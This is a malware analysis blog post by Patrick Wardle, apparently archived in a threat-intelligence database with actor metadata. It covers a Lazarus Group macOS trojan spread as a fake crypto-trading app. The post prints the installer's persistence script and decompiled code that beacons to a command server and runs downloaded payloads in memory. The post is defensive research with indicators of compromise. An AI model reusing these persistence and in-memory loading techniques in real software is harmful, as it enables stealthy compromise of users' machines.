{ "id": "f8e2ab62-21cc-4262-b66a-2ec166820a57", "created_at": "2026-04-06T00:09:23.517118Z", "updated_at": "2026-04-10T03:38:19.351053Z", "deleted_at": null, "sha1_hash": "db4d393ec942e8a3c1c3ce18eef66051aa214a1c", "title": "Lazarus Group Goes 'Fileless'", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2575932, "plain_text": "Lazarus Group Goes 'Fileless'\r\nArchived: 2026-04-05 13:08:18 UTC\r\nLazarus Group Goes 'Fileless'\r\nan implant w/ remote download \u0026 in-memory execution\r\nby: Patrick Wardle / December 3, 2019\r\nOur research, tools, and writing, are supported by \"Friends of Objective-See\" such as:\r\n CleanMy Mac X\r\n\\ \\\r\n📝 👾 Want to play along?\r\nI’ve added the sample (‘OSX.AppleJeus.C’) to our malware collection (password: infect3d)\r\n…please don’t infect yourself!\r\nBackground\r\nToday, Dinesh_Devadoss posted a tweet about another Lazarus group macOS trojan:\r\nAs I’d recently written about a Lazarus group first stage implant (see: “Pass the AppleJeus”), I was intrigued to\r\nanalyze this sample!\r\nWe’ll see while there are some clear overlaps, this (new) sample contains a rather sophisticated capabilities, which\r\nI’ve never seen before in (public) macOS malware!\r\nInfection Vector\r\nIn his tweet, Dinesh kindly provided an MD5 hash: 6588d262529dc372c400bef8478c2eec which allows us to\r\nlocate the sample ( UnionCryptoTrader.dmg ) on VirusTotal, where it’s only flagged as malicious by two of the\r\nengines. (See: UnionCryptoTrader.dmg on VirusTotal).\r\nhttps://objective-see.com/blog/blog_0x51.html\r\nPage 1 of 17\n\nFrom the URL provided in Dinesh’s tweet, ( https://unioncrypto.vip/ ) and spelunking around on VirusTotal,\r\nwe can gain an understanding of the infection mechanism.\r\nLazarus Group has a propensity for targeting users or administrators of crypto-currency exchanges. And their de\r\nfacto method of infecting such targets is via fake crypto-currency company and trading applications.\r\nAs part of my recent RSA presentation I highlighted their attack vector: \\\r\nIn this specific attack, Lazarus group created a new website, unioncrypto.vip : \\\r\nPinging this site reveals that it’s still online, and resolving to 104.168.167.16 :\r\n$ ping unioncrypto.vip\r\nPING unioncrypto.vip (104.168.167.16): 56 data bytes\r\nhttps://objective-see.com/blog/blog_0x51.html\r\nPage 2 of 17\n\n64 bytes from 104.168.167.16: icmp_seq=0 ttl=112 time=91.483 ms\r\nQuerying VirusTotal with this IP address, we find a URL request that triggered a download of the malicious\r\napplication ( https://www.unioncrypto.vip/download/W6c2dq8By7luMhCmya2v97YeN ):\r\nIt seems reasonable to assume that Lazarus Group is sticking with its successful attack vector (of targeting\r\nemployees of crypto-currency exchanges with trojanized trading applications) …for now!\r\nAnalysis (Persistence)\r\nLet’s begin analysis of the trojanzied application. Said application is delivered via a disk image, named\r\nUnionCryptoTrader.dmg We can mount this disk image, via the hdiutil attach command:\r\n$ hdiutil attach ~/Downloads/UnionCryptoTrader.dmg\r\nexpected CRC32 $7720DF1C\r\n/dev/disk4 GUID_partition_scheme\r\n/dev/disk4s1 Apple_APFS\r\n/dev/disk5 EF57347C-0000-11AA-AA11-0030654\r\n/dev/disk5s1 41504653-0000-11AA-AA11-0030654 /Volumes/UnionCryptoTrader\r\nIt contains a single package: UnionCryptoTrader.pkg :\r\n$ ls -lart /Volumes/UnionCryptoTrader\r\ntotal 40120\r\n-rwxrwxrwx 1 patrick staff 20538265 Sep 4 06:25 UnionCryptoTrader.pkg\r\nVia our “WhatsYourSign” application, it’s easy to see the UnionCryptoTrader.pkg package is unsigned:\r\nhttps://objective-see.com/blog/blog_0x51.html\r\nPage 3 of 17\n\n…which means macOS will warn the user, if they attempt to open it:\r\nTaking a peek at the package, uncovers a postinstall script that will be executed at the end of the installation\r\nprocess:\r\n 1#!/bin/sh\r\n 2mv /Applications/UnionCryptoTrader.app/Contents/Resources/.vip.unioncrypto.plist\r\n 3 /Library/LaunchDaemons/vip.unioncrypto.plist\r\n 4\r\n 5chmod 644 /Library/LaunchDaemons/vip.unioncrypto.plist\r\n 6mkdir /Library/UnionCrypto\r\n 7\r\n 8mv /Applications/UnionCryptoTrader.app/Contents/Resources/.unioncryptoupdater\r\n 9 /Library/UnionCrypto/unioncryptoupdater\r\n10\r\n11chmod +x /Library/UnionCrypto/unioncryptoupdater\r\n12/Library/UnionCrypto/unioncryptoupdater \u0026\r\nhttps://objective-see.com/blog/blog_0x51.html\r\nPage 4 of 17\n\nThe purpose of this script is to persistently install a launch daemon.\r\nSpecifically, the script will:\r\nmove a hidden plist ( .vip.unioncrypto.plist ) from the application’s Resources directory into\r\n/Library/LaunchDaemons\r\nset it to be owned by root\r\ncreate a /Library/UnionCrypto directory\r\nmove a hidden binary ( .unioncryptoupdater ) from the application’s Resources directory into\r\n/Library/UnionCrypto/\r\nset it to be executable\r\nexecute this binary ( /Library/UnionCrypto/unioncryptoupdater )\r\nWe can passively observe this part of the installation via either our File or Process monitors:\r\n# ProcessMonitor.app/Contents/MacOS/ProcessMonitor -pretty\r\n{\r\n \"event\" : \"ES_EVENT_TYPE_NOTIFY_EXEC\",\r\n \"process\" : {\r\n \"uid\" : 0,\r\n \"arguments\" : [\r\n \"mv\",\r\n \"/Applications/UnionCryptoTrader.app/Contents/Resources/.vip.unioncrypto.plist\",\r\n \"/Library/LaunchDaemons/vip.unioncrypto.plist\"\r\n ],\r\n \"ppid\" : 3457,\r\n \"ancestors\" : [\r\n 3457,\r\n 951,\r\n 1\r\n ],\r\n \"signing info\" : {\r\n \"csFlags\" : 603996161,\r\n \"signatureIdentifier\" : \"com.apple.mv\",\r\n \"cdHash\" : \"7F1F3DE78B1E86A622F0B07F766ACF2387EFDCD\",\r\n \"isPlatformBinary\" : 1\r\n },\r\n \"path\" : \"/bin/mv\",\r\n \"pid\" : 3458\r\n },\r\n \"timestamp\" : \"2019-12-05 20:14:28 +0000\"\r\n}\r\nhttps://objective-see.com/blog/blog_0x51.html\r\nPage 5 of 17\n\n...\r\n{\r\n \"event\" : \"ES_EVENT_TYPE_NOTIFY_EXEC\",\r\n \"process\" : {\r\n \"uid\" : 0,\r\n \"arguments\" : [\r\n \"mv\",\r\n \"/Applications/UnionCryptoTrader.app/Contents/Resources/.unioncryptoupdater\",\r\n \"/Library/UnionCrypto/unioncryptoupdater\"\r\n ],\r\n \"ppid\" : 3457,\r\n \"ancestors\" : [\r\n 3457,\r\n 951,\r\n 1\r\n ],\r\n \"signing info\" : {\r\n \"csFlags\" : 603996161,\r\n \"signatureIdentifier\" : \"com.apple.mv\",\r\n \"cdHash\" : \"7F1F3DE78B1E86A622F0B07F766ACF2387EFDCD\",\r\n \"isPlatformBinary\" : 1\r\n },\r\n \"path\" : \"/bin/mv\",\r\n \"pid\" : 3461\r\n },\r\n \"timestamp\" : \"2019-12-05 20:14:28 +0000\"\r\n}\r\n...\r\n{\r\n \"event\" : \"ES_EVENT_TYPE_NOTIFY_EXEC\",\r\n \"process\" : {\r\n \"uid\" : 0,\r\n \"arguments\" : [\r\n \"/Library/UnionCrypto/unioncryptoupdater\"\r\n ],\r\n \"ppid\" : 1,\r\n \"ancestors\" : [\r\n 1\r\n ],\r\n \"signing info\" : {\r\n \"csFlags\" : 536870919,\r\n \"signatureIdentifier\" : \"macloader-55554944ee2cb96a1f5132ce8788c3fe0dfe7392\",\r\n \"cdHash\" : \"8D204E5B7AE08E80B728DE675AEB8CC735CCF6E7\",\r\nhttps://objective-see.com/blog/blog_0x51.html\r\nPage 6 of 17\n\n\"isPlatformBinary\" : 0\r\n },\r\n \"path\" : \"/Library/UnionCrypto/unioncryptoupdater\",\r\n \"pid\" : 3463\r\n },\r\n \"timestamp\" : \"2019-12-05 20:14:28 +0000\"\r\n}\r\nThough installing a launch daemon requires root access, the installer will prompt the user for their credentials:\r\nOnce the installer completes, the binary unioncryptoupdater will both currently executing, and persistently\r\ninstalled:\r\n$ ps aux | grep [u]nioncryptoupdater\r\nroot 1254 /Library/UnionCrypto/unioncryptoupdater\r\nOf course, BlockBlock will detect the launch daemon persistence attempt:\r\nhttps://objective-see.com/blog/blog_0x51.html\r\nPage 7 of 17\n\nAs noted, persistence is achieved via the vip.unioncrypto.plist launch daemon:\n 1?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\n 2\n 3 4 5 Label 6 vip.unioncrypto.product 7 ProgramArguments 8 9 /Library/UnionCrypto/unioncryptoupdater 10 11 RunAtLoad 12 13 14 As the RunAtLoad key is set to true this instruct macOS to automatically launch the binary specified in the\nProgramArguments array each time the infected system is rebooted. As such\n/Library/UnionCrypto/unioncryptoupdater will be automatically (re) executed.\nAnalysis (Capabilities)\nOk, time to analyze the persisted unioncryptoupdater binary.\nVia the file command we can ascertain its a standard macOS (64bit) binary:\n$ file /Library/UnionCrypto/unioncryptoupdater\n/Library/UnionCrypto/unioncryptoupdater: Mach-O 64-bit executable x86_64\nThe codesign utility shows us both it identifier ( macloader-55554944ee2cb96a1f5132ce8788c3fe0dfe7392 ) and\nthe fact that it’s not signed with a valid code signing id, but rather adhoc ( Signature=adhoc ):\n$ codesign -dvv /Library/UnionCrypto/unioncryptoupdater\nExecutable=/Library/UnionCrypto/unioncryptoupdater\nIdentifier=macloader-55554944ee2cb96a1f5132ce8788c3fe0dfe7392\nFormat=Mach-O thin (x86_64)\nCodeDirectory v=20100 size=739 flags=0x2(adhoc) hashes=15+5 location=embedded\nSignature=adhoc\nInfo.plist=not bound\nTeamIdentifier=not set\nSealed Resources=none\nInternal requirements count=0 size=12\nRunning the strings utility (with the -a flag) reveals some interesting strings:\nhttps://objective-see.com/blog/blog_0x51.html\nPage 8 of 17\n\n$ strings -a /Library/UnionCrypto/unioncryptoupdater\r\ncurl_easy_perform() failed: %s\r\nAES_CYPHER_128 encrypt test case:\r\nAES_CYPHER_128 decrypt test case:\r\nAES_CYPHER_192 encrypt test case:\r\nAES_CYPHER_192 decrypt test case:\r\nAES_CYPHER_256 encrypt test case:\r\nAES_CYPHER_256 decrypt test case:\r\nInput:\r\nIOPlatformExpertDevice\r\nIOPlatformSerialNumber\r\n/System/Library/CoreServices/SystemVersion.plist\r\nProductVersion\r\nProductBuildVersion\r\nMac OS X %s (%s)\r\nABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\r\n/tmp/updater\r\n%s %s\r\nNO_ID\r\n%s%s\r\n12GWAPCT1F0I1S14\r\nauth_timestamp\r\nauth_signature\r\ncheck\r\nhttps://unioncrypto.vip/update\r\ndone\r\n/bin/rcp\r\nCould not create image.\r\nCould not link image.\r\nCould not find ec.\r\nCould not resolve symbol: _sym[25] == 0x4d6d6f72.\r\nCould not resolve symbol: _sym[4] == 0x4d6b6e69.\r\nStrings such as IOPlatformSerialNumber and reference to the SystemVersion.plist likely indicate basic\r\nsurvey capabilities (to gather information about the infected system). The reference to libcurl API\r\n( curl_easy_perform ) and embedded url https://unioncrypto.vip/update indicate networking and/or\r\ncommand and control capabilities.\r\nOpening a the binary ( unioncryptoupdater ) in a disassembler, shows the main function simply invoking a\r\nfunction named onRun :\r\n1int _main() {\r\n2 rbx = objc_autoreleasePoolPush();\r\n3\r\nhttps://objective-see.com/blog/blog_0x51.html\r\nPage 9 of 17\n\n4 onRun();\r\n5\r\n6 objc_autoreleasePoolPop(rbx);\r\n7 return 0x0;\r\n8}\r\nThough rather long and involved we can break down its logic.\r\n1. Instantiate a C++ class named Barbeque: Barbeque::Barbeque(); By piping the output of the nm utility\r\ninto c++filt we can dump other methods from the Barbeque class:\r\n$ nm unioncryptoupdater | c++filt\r\nunsigned short Barbeque::Barbeque()\r\nunsigned short Barbeque::get( ... )\r\nunsigned short Barbeque::post( ... )\r\nunsigned short Barbeque::~Barbeque()\r\nBased on method names, perhaps the Barbeque class contains network related logic?\r\n\\\r\n2. Invokes a function named getDeviceSerial to retrieve the system serial number via IOKit\r\n( IOPlatformSerialNumber ):\r\n 1int __Z15getDeviceSerialPc(int * arg0) {\r\n 2\r\n 3 ...\r\n 4\r\n 5 r15 = *(int32_t *)*_kIOMasterPortDefault;\r\n 6 rax = IOServiceMatching(\"IOPlatformExpertDevice\");\r\n 7 rax = IOServiceGetMatchingService(r15, rax);\r\n 8 if (rax != 0x0) {\r\n 9 rbx = CFStringGetCString(IORegistryEntryCreateCFProperty(rax,\r\n10 @\"IOPlatformSerialNumber\", **_kCFAllocatorDefault, 0x0),\r\n11 r14, 0x20, 0x8000100) != 0x0 ? 0x1 : 0x0;\r\n12\r\n13 IOObjectRelease(rax);\r\n14 }\r\n15 rax = rbx;\r\n16 return rax;\r\n17}\r\nDebugging the malware (in a VM), shows this method correctly returns the virtual machine’s serial number\r\n( VM+nL/ueNmNG ):\r\nhttps://objective-see.com/blog/blog_0x51.html\r\nPage 10 of 17\n\n(lldb) x/s $rax\r\n0x7ffeefbff810: \"VM+nL/ueNmNG\"\r\n\\\r\n3. Invokes a function named getOSVersion in order to retrieve the OS version, by reading the system file,\r\n/System/Library/CoreServices/SystemVersion.plist (which contains various version-related\r\ninformation):\r\n$ defaults read /System/Library/CoreServices/SystemVersion.plist\r\n{\r\n ProductBuildVersion = 18F132;\r\n ProductCopyright = \"1983-2019 Apple Inc.\";\r\n ProductName = \"Mac OS X\";\r\n ProductUserVisibleVersion = \"10.14.5\";\r\n ProductVersion = \"10.14.5\";\r\n iOSSupportVersion = \"12.3\";\r\n}\r\nAgain in the debugger, we can observe the malware retrieving this information (specifically the\r\nProductName , ProductUserVisibleVersion , and ProductBuildVersion ):\r\n(lldb) x/s 0x7ffeefbff790\r\n0x7ffeefbff790: \"Mac OS X 10.14.5 (18F132)\"\r\n4. Builds a string consisting of the time and hardcode value (key?): 12GWAPCT1F0I1S14\r\n1sprintf(\u0026var_130, \"%ld\", time(0x0));\r\n2rax = sprintf(\u0026var_1B0, \"%s%s\", \u0026var_130, \"12GWAPCT1F0I1S14\");\r\n5. Invokes the Barbeque::post() method to contact a remote command \u0026 control server\r\n( https://unioncrypto.vip/update ): The network logic leverages via libcurl to perform the actual\r\ncommunications:\r\n1curl_easy_setopt(*r15, 0x2727);\r\n2curl_easy_setopt(*r15, 0x4e2b);\r\n3curl_easy_setopt(*r15, 0x2711);\r\n4rdi = *r15;\r\n5curl_easy_setopt(rdi, 0x271f);\r\n6rax = curl_easy_perform(*r15);\r\nOur firewall LuLu easily detects this connection attempt:\r\nhttps://objective-see.com/blog/blog_0x51.html\r\nPage 11 of 17\n\n6. If the server responds with the string \"0\" the malware will sleep for 10 minutes, before checking in again\r\nwith the server:\r\n1if (std::__1::basic_string ... ::compare(rbx, 0x0, 0xffffffffffffffff, \"0\", 0x1) == 0x0)\r\n2{\r\n3 sleep(0x258);\r\n4 goto connect2Server;\r\n5}\r\nOtherwise it will invoke a function to base64 decode the server’s respond, followed by a function named\r\nprocessUpdate to execute a downloaded payload from the server.\r\nOk, so we’ve got a fairly standard persistent 1st-stage implant which beacons to a remote server for (likely) a 2nd-\r\nstage fully-featured implant.\r\nAt this time, while the remote command \u0026 control server remains online, it simply it responding with a “0”,\r\nmeaning no payload is provided :( \\\r\nAs such, we must rely on static analysis methods for the remainder of our analysis.\r\nHowever, the is one rather unique aspect of this 1st-stage implant: the ability to execute the received payload,\r\ndirectly from memory!\r\nLooks take a closer look at how the malware implements this stealthy capability.\r\nRecall that if the server responds with payload (and not a string \"0\" ), the malware invokes the processUpdate\r\nfunction. First the processUpdate decrypts said payload (via aes_decrypt_cbc ), then invokes a function named\r\nload_from_memory .\r\nhttps://objective-see.com/blog/blog_0x51.html\r\nPage 12 of 17\n\n1aes_decrypt_cbc(0x0, r15, rdx, rcx, \u0026var_40);\r\n2memcpy(\u0026var_C0, r15, 0x80);\r\n3rbx = rbx + 0x90;\r\n4r14 = r14 - 0x90;\r\n5rax = _load_from_memory(rbx, r14, \u0026var_C0, rcx, \u0026var_40, r9);\r\nThe load_from_memory function first mmaps some memory (with protections: PROT_READ | PROT_WRITE |\r\nPROT_EXEC). Then copies the decrypted payload into this memory region, before invoking a function named\r\nmemory_exec2 :\r\n 1int _load_from_memory(int arg0, int arg1, int arg2, int arg3, int arg4, int arg5) {\r\n 2 r14 = arg2;\r\n 3 r12 = arg1;\r\n 4 r15 = arg0;\r\n 5 rax = mmap(0x0, arg1, 0x7, 0x1001, 0xffffffffffffffff, 0x0);\r\n 6 if (rax != 0xffffffffffffffff) {\r\n 7 memcpy(rax, r15, r12);\r\n 8 r14 = _memory_exec2(rax, r12, r14);\r\n 9 munmap(rax, r12);\r\n10 rax = r14;\r\n11 }\r\n12 else {\r\n13 rax = 0xffffffffffffffff;\r\n14 }\r\n15 return rax;\r\n16}\r\nThe memory_exec2 function invokes the Apple API NSCreateObjectFileImageFromMemory to create an “object\r\nfile image” from a memory buffer (of a mach-O file). Following this, the NSLinkModule method is called to link\r\nthe “object file image”.\r\n1int _memory_exec2(int arg0, int arg1, int arg2) {\r\n2\r\n3 ...\r\n4 rax = NSCreateObjectFileImageFromMemory(rdi, rsi, \u0026var_58);\r\n5\r\n6 rax = NSLinkModule(var_58, \"core\", 0x3);\r\n7\r\nAs the layout of an in-memory process image is different from its on disk-in image, one cannot simply copy a file\r\ninto memory and directly execute it. Instead, one must invoke APIs such as\r\nNSCreateObjectFileImageFromMemory and NSLinkModule (which take care of preparing the in-memory\r\nmapping and linking).\r\nhttps://objective-see.com/blog/blog_0x51.html\r\nPage 13 of 17\n\nOnce the malware has mapped and linked the downloaded payload, it invokes a function named find_macho\r\nwhich appears to search the memory mapping for MH_MAGIC_64 , the 64-bit “mach magic number” in the\r\nmach_header_64 structure ( 0xfeedfacf ):\r\n 1int find_macho(int arg0, int arg1, int arg2, int arg3) {\r\n 2\r\n 3 ...\r\n 4\r\n 5 do {\r\n 6 ...\r\n 7 if ((*(int32_t *)__error() == 0x2) \u0026\u0026 (*(int32_t *)rbx == 0xfeedfacf)) {\r\n 8 break;\r\n 9 }\r\n10\r\n11 } while (true);\r\n12}\r\nOnce the find_macho method returns, the malware begins parsing the in-memory mach-O file. It appears to be\r\nlooking for the address of LC_MAIN load command ( 0x80000028 ):\r\n1if (*(int32_t *)rcx == 0x80000028) goto loc_100006ac7;\r\nFor an in-depth technical discussion of parsing mach-O files, see: “Parsing Mach-O Files”.\r\nThe LC_MAIN load command contains information such as the entry point of the mach-O binary (for example,\r\noffset 18177 for the unioncryptoupdater binary):\r\nhttps://objective-see.com/blog/blog_0x51.html\r\nPage 14 of 17\n\nThe malware then retrieves the offset of the entry point (found at offset 0x8 within the LC_MAIN load\r\ncommand), sets up some arguments, then jumps to this address:\r\n1//rcx points to the `LC_MAIN` load command\r\n2r8 = r8 + *(rcx + 0x8);\r\n3...\r\n4\r\n5//invoke payload's entry point!\r\n6rax = (r8)(0x2, \u0026var_40, \u0026var_48, \u0026var_50, r8);\r\nDelightful! Pure in-memory execution of a remotely downloaded payload. 🤩 Sexy!\r\nIn 2015, at BlackHat I discussed this method of in-memory file execution as a means to increase stealth and\r\ncomplicate forensics (See: “Writing Bad @$$ Malware for OS X”):\r\n…kinda neat to see it (finally) show up in macOS malware in the wild!\r\n\\\r\nFormer #OBTS speaker Felix Seele (@c1truz_) noted that the (in)famous InstallCore adware also (ab)used the\r\nNSCreateObjectFileImageFromMemory and NSLinkModule APIs to achieve in-memory execution.\r\nInterestingly, the malware has a “backup” plan if the in-memory code execution fails. Specifically if\r\nload_from_memory does not return 0 (success) it will write out the received payload to /tmp/updater and then\r\nexecute it via a call to system :\r\nhttps://objective-see.com/blog/blog_0x51.html\r\nPage 15 of 17\n\n1rax = _load_from_memory(rbx, r14, \u0026var_C0, rcx, \u0026var_40, r9);\r\n 2if(rax != 0x0) {\r\n 3 fwrite(rbx, r14, 0x1, fopen(\"/tmp/updater\", \"wb\"));\r\n 4 fclose(rax);\r\n 5\r\n 6 chmod(\"/tmp/updater\", 0x1ff);\r\n 7 sprintf(\u0026var_4C0, \"%s %s\", \"/tmp/updater\", \u0026var_C0);\r\n 8\r\n 9 rax = system(\u0026var_4C0);\r\n10\r\n11 unlink(\"/tmp/updater\");\r\n12}\r\nAlways good to handle error conditions and have a plan B!\r\nConclusion\r\nLazarus group continues to target macOS users with ever evolving capabilities. Today, we analyzed a new sample\r\nwith the ability to remotely download and execute payloads directly from memory!\r\nThe good news is the average Mac user doesn’t have to worry about being targeted by APT groups such as\r\nLazarus. Moreover, as the installer package, UnionCryptoTrader.pkg is unsigned, macOS will warn any users if\r\nthey attempt to open it:\r\nHowever, if you do want to manually check if you’re infected, the following IoCs should help:\r\nLaunch Daemon property list: /Library/LaunchDaemons/vip.unioncrypto.plist\r\nRunning process/binary: /Library/UnionCrypto/unioncryptoupdater\r\nOr a tool such as KnockKnock can also uncover the infection:\r\nhttps://objective-see.com/blog/blog_0x51.html\r\nPage 16 of 17\n\n\\\r\n❤️ Love these blog posts and/or want to support my research and tools? \\ You can support them via my [Patreon]\r\n(https://www.patreon.com/bePatron?c=701171) page!\r\n…or better sign up for our “The Art of Mac Malware Analysis” class at Objective by the Sea v3.0! \\\r\nSource: https://objective-see.com/blog/blog_0x51.html\r\nhttps://objective-see.com/blog/blog_0x51.html\r\nPage 17 of 17", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://objective-see.com/blog/blog_0x51.html" ], "report_names": [ "blog_0x51.html" ], "threat_actors": [ { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "544ecd2c-82c9-417c-9d98-d1ae395df964", "created_at": "2025-10-29T02:00:52.035025Z", "updated_at": "2026-04-10T02:00:05.408558Z", "deleted_at": null, "main_name": "AppleJeus", "aliases": [ "AppleJeus", "Gleaming Pisces", "Citrine Sleet", "UNC1720", "UNC4736" ], "source_name": "MITRE:AppleJeus", "tools": null, "source_id": "MITRE", "reports": null }, { "id": "75108fc1-7f6a-450e-b024-10284f3f62bb", "created_at": "2024-11-01T02:00:52.756877Z", "updated_at": "2026-04-10T02:00:05.273746Z", "deleted_at": null, "main_name": "Play", "aliases": null, "source_name": "MITRE:Play", "tools": [ "Nltest", "AdFind", "PsExec", "Wevtutil", "Cobalt Strike", "Playcrypt", "Mimikatz" ], "source_id": "MITRE", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", 